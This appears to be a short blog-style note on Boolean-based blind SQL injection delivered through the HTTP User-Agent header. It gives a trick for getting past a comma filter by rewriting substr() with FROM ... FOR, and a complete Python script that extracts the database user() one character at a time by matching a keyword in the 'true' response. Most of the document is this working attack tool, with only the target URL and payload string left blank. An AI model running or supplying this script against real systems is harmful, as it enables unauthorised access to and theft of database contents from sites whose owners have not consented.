I recently came across this Boolean-based blind injection (the condition goes in the User-Agent header) and found it interesting, so here is a note on it.
Small trick:
substr(user(),1,1)
is equivalent to
substr(user() from 1 for 1), which gets around a filter that blocks commas (the FROM ... FOR form is standard SQL and MySQL accepts it).
Reference script template (one request per candidate byte; the loop stops when ascii() of the next character is 0, which is what MySQL returns for the empty string once substr runs past the end of the value):
import re
import sys
import urllib.request

pattern = re.compile(r'2014-11-16')  # keyword that only shows up in the "true" response

url = ''          # put the injectable URL here
payload = 'user()'  # expression being extracted one character at a time
ua_template = ''  # put the User-Agent payload here; use {count} and {character}
                  # where the position and the ASCII value go, i.e. build it around
                  # ascii(substr(user() from {count} for 1))={character}

for count in range(1, 100):
    for character in range(0, 128):
        request = urllib.request.Request(url)
        request.add_header('User-Agent', ua_template.format(count=count, character=character))
        response = urllib.request.urlopen(request)
        body = response.read().decode('utf-8', 'replace')
        match = pattern.search(body)
        if match:
            if character == 0:
                # ascii('') is 0: substr ran past the end, the value is complete
                sys.exit(0)
            print('%d -- %s' % (count, chr(character)))
            break
Reference: here